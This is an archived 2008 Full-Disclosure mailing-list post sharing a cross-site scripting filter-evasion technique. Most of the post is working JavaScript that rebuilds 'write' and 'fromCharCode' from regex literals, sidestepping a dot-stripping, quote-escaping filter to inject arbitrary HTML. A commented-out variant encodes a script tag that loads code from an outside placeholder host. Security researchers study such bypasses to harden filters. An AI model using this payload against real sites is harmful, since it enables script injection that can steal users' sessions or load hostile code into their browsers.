| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 18 Jun 2008 17:49:59 +0200
From: "Thomas Pollet" <thomas.pollet@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: xss dot(.) filter evasion
Hello,
I came across this site that implemented some filtering so the dots were
replaced by an underscore, also the quotes and backslash were escaped.
I came up with the code below to bypass this filtering (write anything to
the page using String.fromCharCode)
Someone knows a different way to do this?
<html>
<head>
<title>
</title>
</head>
<body>
<script>
function write(str){
//document.write() doesn't work as it becomes document_write()
var s = /write/;
var w = String();
var n = String();
w += s;
//cast to string so we can index
w += s;
n += w[1] + w[2] + w[3] + w[4] + w[5];
//call document['write']
document[n](str);
}
var s = /fromCharCode/;
var w = String();
var n = String();
w += s;
n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
w[11] + w[12];
write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
62,104,60,47,97,62));
/*
write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
,111,109,34,62));
*/
</script>
</body>
</html>
Regards,
Thoms Pollet
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists